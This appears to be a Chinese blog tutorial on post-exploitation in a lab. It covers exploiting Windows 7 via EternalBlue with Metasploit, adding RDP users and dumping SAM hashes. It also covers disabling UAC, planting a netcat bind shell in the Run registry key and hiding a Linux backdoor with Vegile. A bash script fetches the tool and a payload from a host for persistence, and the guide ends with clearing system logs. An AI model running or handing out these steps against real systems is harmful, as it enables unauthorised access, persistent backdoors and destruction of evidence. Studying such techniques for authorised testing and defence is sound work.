内容

  1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透
  2. 实战-Linux 无文件木马程序
  3. 实战-使用脚本来进行自动创建后门
  4. 系统日志清理

1.实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

本次主要新增加了一些后渗透的步骤,先来回顾一下,永恒之蓝的利用过程
首先准备一台win7靶机最好与我们的kali在同一局域网中
打开msf

搜索相关可以利用的模块,选择对应的进行利用

查看一下需要配置的参数

这里只需要配置目标的ip地址

启动

成功拿到shell,我们来一个屏幕共享



下面进行后渗透,首先在win7主机上创建一个新用户来远程连接win7桌面
PDR概述:远程桌面协议,是一个多通道的协议,让用户连上提供微软终端机服务的电脑
将当前的会话存在后台运行

post/windows/manage/enable_rdp 这个模块可以帮我们启动目标主机的rdp服务,并且可以帮助我们自动创建rdp用户,另外还可以帮我们把目标主机的rdp端口映射到本地


创建rdp用户

下面我们指定sessionID,这里指定的sessionID一定是我们拿到shell的session

创建用户成功,我们在新开一个终端,来利用远程桌面进行连接


这时我们点击是,目标主机的使用用户就会被锁定


目标主机的界面,如果超过三十秒为做出选择,则会自动断开连接

成功连接到win7桌面

下面我们关闭主机防护策略并开启后门
通过ms17-010永恒之蓝获取到的shell可能会出现操作受限的情况,所以我们使用主机的账户信息建立session 进行连接
这个时候可以认为我们把我们创建的用户当作跳板,进而去渗透其他的用户
SAM概述:SAM文件即账号密码数据库文件,SAM文件的位置是C:\Windows\System32\config\SAM
我们来到指定的文件目录进行查看

回到msf控制台,从SAM中导出密码哈希


取出我们自己创建的hack用户的密码哈希
hack:1006:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
创建一条防火墙规则允许4444端口访问网络,否则我饿们建立session时payload不能通过4444端口访问网络倒置建立session失败


UCA概述:用户账户控制(user account control) 是微软公司在其windows vista及更高版本操作系统中采用的一种控制机制,其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意软件损坏系统的效果
下面我们手动关闭UCA

在命令行输入
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windwos\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

开启win7系统主机的默认共享,默认共享对Windows主机的文件共享非常方便,也方便黑客利用这个功能来远程执行命令

在命令行输入下面的命令
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

退出shell返回meterpreter中,我们先将session保存在后台
下面我们利用hash值登录系统,我们先选定指定的模块

我们给当前的模块配置参数

这里局域网中的SMBDomain 都是WORKGROUP 如果是域用户需要配置域名称

这时我们虽然用hack用户进行认证但是哦我们同样获取了SYSTEM权限

下面我们配置一个后门程序,修改UAC的注册表,需要重启才能生效
上传nc到win7中

注册表添加启动项执行nc反弹shell命令

输入下面的命令
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’

防火墙允许443端口访问网络否则开机的时候需要用户点击允许访问网络参可以执行成功

在windows的命令行中输入下面的命令
netsh advfirewall firewall add rule name=“xuegod443” protocol=TCP dir=in localport=443 action=allow
在命令行中输入命令重启目标主机

-r 表示重启
-f 表示强制
-t 表示时间为0的时刻
这个命令就是立即强制重启

需要用户进入系统后我们的后门程序才可以使用,在锁屏的界面我们后门程序还没有运行

查看一下后门程序

下面新建一个终端使用nc连接后门

下面是msf控制台的连接方法

到这里我们就成功的完成了后渗透的所有步骤,具体实战中应该随机应变
从上面的后渗透的各种操作当中可以看得出来对于windows的用户进行渗透,我们也要掌握windows命令行的各种命令,否则我们拿到shell以后没办法维持稳定的shell连接

可能这就是windwos的漏洞的强大之处吧,无视任何杀软,只要系统版本对的上都ok

2.实战-Linux 无文件木马程序

首先生成一个恶意文件让目标系统执行来获取shell


下面我们上传vegile(维吉尔)工具到网站目录下方便centos下载
vegile是用于linux系统渗透测试中的权限维持,vegile这个工具会设置一个后门/rootkit 这个后门会直接隐藏进程,无限连接matasploit,持续维持你的meterpreter会话,即使木马进程被杀死,它依然会再次重新运行,换句话说该进程是无限循环的
Vegile 官方下载链接:https://github.com/Screetsec/Vegile.git
vegile常用的方法:
vegile --i 隐藏你的后门
vegile --u 无限复制你的metasploit会话,即使它呗kill,依然可以再次运行

注意事项:
木马一定要放在vegile目录下
vegile一般用于维持meterpreter会话

下面我们先利用第一个木马来获取目标主机的shell
来到msf指定的模块配置参数,在后台运行

下面我们来到centos靶机,下载制作好的木马,然后添加执行权限并且执行

回到kali发现已经成功

下面我们利用sessionid连接一下centos

我们来查看一下网络状态

可以看到我们的pid是22046

查看一下ip地址

像这种命令找不到我们应该用绝对路径来执行

这个session我们先保持连接,后期需要使用到
下面来创建无文件后门程序
新开一个msf控制台,配置一下参数

我们回到前面的session中,在目标主机上面下载用于隐藏进程的工具

解压

进入到vegile的目录下

添加执行权限

下载用于隐藏执行的后门程序

给程序添加执行权限

隐藏执行后门程序

回到我们另一个msf控制台查看,已经成功拿到shell

下面查看一下我们注入到了哪个进程,目标端口号为50110

为了隐藏我们的踪迹,下面删除我们下载的所有文件,删除的同时也会把hack-ghost文件删除,删除我们的所有文件之后,会话依然存在

3.实战-使用脚本来进行自动创建后门

我们来自己写一个脚本,也就是把之前的命令都自动执行了,不用一步一步去执行了

图片中的Vegile后面的参数应该是 --i

echo -y | :这句代码的作用在于Vegile 执行后会有一个按任意键退出,我们输入给它一个y

最后重定向到/dev/null
这里的2>&1的意思为将标准错误重定向到标准输出,有可能我们会遇到执行错误,所以这里不论是标准输出还是标准错误都会输出到/dev/null里
/dev/null可以看作是一个黑洞,它等价于一个只写文件,所有写入它内部的内容都会永远消失,而尝试从他那里读取内容则什么也读取不到

#!/bin/bash
cd /tmp/
wget 192.168.91.132/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && chmod +x Vegile && wget 192.168.91.132/hack-ghost && chmod +x hack-ghost && echo y | ./Vegile --i hack-ghost >> /dev/null 2>&1
rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master

回到msf控制台,开启监控
我们在利用第一个木马来获取权限,然后在msf执行我们的脚本

首先我们把脚本下载到目标主机,然后执行

我们查看一下当前目录,应为当前目录已经被删除所以显示错误

我们来到root目录查看一下文件

可以看到目录下的文件已经被删除
下面我们配置一下开机自启动,这样只要目标主机开机,我们就能拿到shell,目录/etc/rc.d/rc.local

部分操作系统需要手动给rc.local添加执行权限
我们删除之前的会话,重新开启监听,然后现在重启centos

还没登录就已经拿到shell了

4.系统日志清理

如果仅仅是本地清理,如果目标服务存在日志服务器的情况下,所有的日志还是会被保留。这里仅清理系统相关日志,如果访问了某些服务,比如通过apache服务获取到一个shell,还需要清理apache服务的访问日志

windows日志清理
win+r运行:eventvwr
正常的远程访问在windows的时间查看器中可以看到相关记录

首先我们利用永恒之蓝连接一下我们win7靶机

我们先来到win7查看一下日志文件

回到msf控制台中删除一下日志文件

我们发现只剩下一个日志清楚的日志文件了

再删除系统日志目录下的一些日志文件

下面我们再来linux日志清理
linux可能根据发行版本不同,日志文件名称也有所不同,所以具体清除要根据目标操作系统
清楚历史命令history -c
使系统不在保存历史命令
vi /etc/profile 找到HISTSIZE这个值,修改为0

Metasploit 渗透测试之制作隐藏后门相关推荐

  1. 08、Metasploit渗透测试之信息收集

    本文章所讲内容: 8.1 基于 TCP 协议收集主机信息 8.2 基于 SNMP 协议收集主机信息 8.3 基于 SMB 协议收集信息 8.4 基于 SSH 协议收集信息 8.5 基于 FTP 协议收 ...

  2. Metasploit(3) 渗透测试之通过客户端进行渗透

    客户端渗透测试原理 在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档.pdf文件.想要达到效果同时也要利用 ...

  3. 《Metasploit渗透测试魔鬼训练营》学习笔记

    Metasploit渗透测试魔鬼训练营学习笔记 法律常识 <中华人民共和国网络安全法>已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布 ...

  4. 第一章:渗透测试之信息收集

    第一章:渗透测试之信息收集 信息收集主要内容:服务器配置信息.网站敏感信息. 其中包括:域名及子域名信息.目标网站系统.CMS指纹.目标网站的真实IP.开放端口等. 总之:只要与目标网站有关就尽量去搜 ...

  5. 使用 Metasploit 渗透局域网 Windows 设备

    使用 Metasploit 渗透局域网 Windows 设备 警告 请勿将本文提到的任何技术用于非法用途. 请遵守<中华人民共和国刑法><中华人民共和国网络安全法><中华 ...

  6. Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)

    1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...

  7. Metasploit渗透框架介绍及永恒之蓝复现

    Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...

  8. 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)

    一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...

  9. 近源渗透测试之Keylogger实战

    近源渗透测试之Keylogger实战 转载,侵删 原创 大好人  来源于公众号:雷神众测 原文链接:https://mp.weixin.qq.com/s?__biz ... 8a1fcbc183d84 ...

最新文章

  1. 【Python刷题】_4
  2. Halcon初学者知识:用set_paint直观显示图像的属性
  3. 获取webbrowser中元素的屏幕坐标
  4. JavaScript:向数组开头添加
  5. 新风格高端大气站长素材资源下载站源码 织梦dedecms内核(带手机版)
  6. 2020年Q3笔记本电脑出货量:惠普反超联想居首位 苹果第四
  7. 职称计算机excel2015年,2015年职称计算机《Excel2003》最新章节练习题(5)
  8. AI持续赋能,搜狗S1会给录音笔行业带来哪些新变化?
  9. java怎么倒计时_详解java倒计时三种简单实现方式
  10. 程序状态字寄存器PSW
  11. hibernate 镜像下载_虚拟光驱软件下载手机版-虚拟光驱免费中文版64位下载v5.8.0...
  12. 一个贼简单的代码表白
  13. php宿舍管理系统毕业论文,学生宿舍管理系统(源码+论文)
  14. 香港股票交易成本计算器 android,股票交易手续费计算器
  15. php李炎恢笔记,李炎恢PHP笔记2
  16. 传智播客黑马程序员_新程序员的最佳播客,以及聆听他们的最佳工具
  17. Linux系统下KVM虚拟机的基本管理和操作
  18. 硒化钼纳米颗粒/MoSe2 Nanoparticles的介绍 提供氨基/NH2/羧基COOH/PEG/蛋白Protein/抗体antibody功能化修饰的硒化钼纳米颗粒/MoSe2 Nanoparti
  19. 修改ua html5,html5中bootstrap表单样式文件html,兼容多种UA终端
  20. win系统流畅度测试软件,详细教您win10和win7谁更流畅

热门文章

  1. ContentProvider android:exported = “true”
  2. 华擎计算机主板参数,【华擎Z390参数】华擎Z390系列主板参数-ZOL中关村在线
  3. 智能卡:常见智能卡芯片型号及其厂家-1
  4. 为啥是SoA?(SoA化的挑战)
  5. Thinkphp6 对接google谷歌第三方登录接口
  6. RTCP Receiver Report(RR)相关
  7. 关于ORACLE索引
  8. jarsigner签名APK完整步骤
  9. Exiv2 With XMP for Android
  10. 微信小程序---文本域输入带最大字数限制